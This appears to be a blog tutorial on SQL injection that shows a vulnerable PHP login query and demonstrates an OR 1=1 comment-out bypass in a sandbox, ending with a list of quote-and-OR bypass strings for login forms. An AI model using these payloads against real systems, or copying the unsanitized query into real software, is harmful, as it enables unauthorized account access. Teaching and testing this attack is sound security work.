SQL injection in login page
Bypass login page
SQL Injection Tutorial: Learn with Example
Data is one of the most vital components of information systems. Database powered web applications are used by the organization to get data from customers. SQL is the acronym for Structured Query Language. It is used to retrieve and manipulate data in the database.
What is a SQL Injection?
SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true. It takes advantage of the design flaws in poorly designed web applications to exploit SQL statements to execute malicious SQL code.
How SQL Injection Works
The types of attacks that can be performed using SQL injection vary depending on the type of database engine. The attack works on dynamic SQL statements. A dynamic statement is a statement that is generated at run time using parameters password from a web form or URI query string.
Let’s consider a simple web application with a login form. The code for the HTML form is shown below.
<form action=‘index.php’ method="post"> <input type="email" name="email" required="required"/> <input type="password" name="password"/> <input type="checkbox" name="remember_me" value="Remember me"/> <input type="submit" value="Submit"/> </form>
HERE,
- The above form accepts the email address, and password then submits them to a PHP file named index.php.
- It has an option of storing the login session in a cookie. We have deduced this from the remember_me checkbox. It uses the post method to submit data. This means the values are not displayed in the URL.
Let’s suppose the statement at the backend for checking user ID is as follows
SELECT * FROM users WHERE email = $_POST['email'] AND password = md5($_POST['password']);
HERE,
- The above statement uses the values of the $_POST[] array directly without sanitizing them.
- The password is encrypted using MD5 algorithm.
We will illustrate SQL injection attack using sqlfiddle. Open the URL http://sqlfiddle.com/ in your web browser. You will get the following window.
Note: you will have to write the SQL statements
Step 1) Enter this code in left pane
CREATE TABLE `users` (
`id` INT NOT NULL AUTO_INCREMENT,
`email` VARCHAR(45) NULL,
`password` VARCHAR(45) NULL,
PRIMARY KEY (`id`));
insert into users (email,password) values ('m@m.com',md5('abc'));
Step 2) Click Build Schema
Step 3) Enter this code in right pane
select * from users;
Step 4) Click Run SQL. You will see the following result
Suppose user supplies admin@admin.sys and 1234 as the password. The statement to be executed against the database would be
SELECT * FROM users WHERE email = 'admin@admin.sys' AND password = md5('1234');
The above code can be exploited by commenting out the password part and appending a condition that will always be true. Let’s suppose an attacker provides the following input in the email address field.
xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ]
xxx for the password.
The generated dynamic statement will be as follows.
SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND password = md5('1234');
HERE,
- xxx@xxx.xxx ends with a single quote which completes the string quote
- OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to only one record.
- -- ' AND … is a SQL comment that eliminates the password part.
Copy the above SQL statement and paste it in SQL FiddleRun SQL Text box as shown below
--------------------------------------------------------------------------------------------------------
Basic command you can apply
- id:- "1" OR "1" password:- "1" OR "1"
- id:- '1' OR '1' password:- '1' OR '1'
- id:- 1" OR "1 password:- 1" OR "1
- id:- 1' OR '1 password:- 1' OR '1
- id:- "1" OR "1";#
- id:- '1' OR '1';#
- id:- 1" OR "1";#
- id:- 1' OR '1';#
For practice goto this site
Comments
Post a Comment